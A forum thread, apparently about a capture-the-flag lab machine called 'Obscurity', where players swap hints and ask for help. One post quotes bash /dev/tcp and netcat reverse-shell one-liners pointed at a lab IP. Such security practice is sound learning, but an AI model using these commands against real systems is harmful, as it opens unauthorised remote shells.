Obscurity

Type your comment> @djbrains said:

Type your comment> @w4x said:

Type your comment> @djbrains said:

@clubby789 ,what is the intended way? I got 2 ways now. One gave me the root password and the other only the flag.

The goal isn’t to root the machine ? x)
Rooting or root access? :wink:

Virtualbox?

Excellent box and pretty straight forward :smiley: I found two ways to root it :wink: don’t know which one was the intended but both were fun

Type your comment> @zuk4 said:

Hi All,

I’m new in the hacking world and I have decide to try this machine, but I’m struggling to understand the py script or even run it, I’m not a python person, my mistake it seems.

So I have found the directory and the py script and I need help to understand it, is anyone able to help me?

Thank you

bro how you found the secre directory and py file can you help me please

Hi,

I’m stuck with the dir… no way to find it. Can anyone give me a nudge?
I’ve tried all the fuzzing tools but with no luck… also manually with the same result.

So I’ve found the place in the foothold where I can manipulate input to the server to achieve command execution and I’ve written a script that can encode and then execute either system commands or instructions in parseltongue. However, I cannot figure out how to get a reverse shell or even just exfil data. The only way that I know for a fact my commands can be run by the system is by sending a “wget” and setting up a HTTP server on my box and seeing the file request go through. However, if I try to run a
bash -i >& /dev/tcp/10.10.x.x/31337 0>&1 or a
nc -e /bin/bash 10.10.x.x 31337
I get no reverse shell. I’ve reset the box and still no reverse shell, since I’ve seen some people try that. I feel like I’m on the right track, but could use a nudge in the right direction to actually get on the box.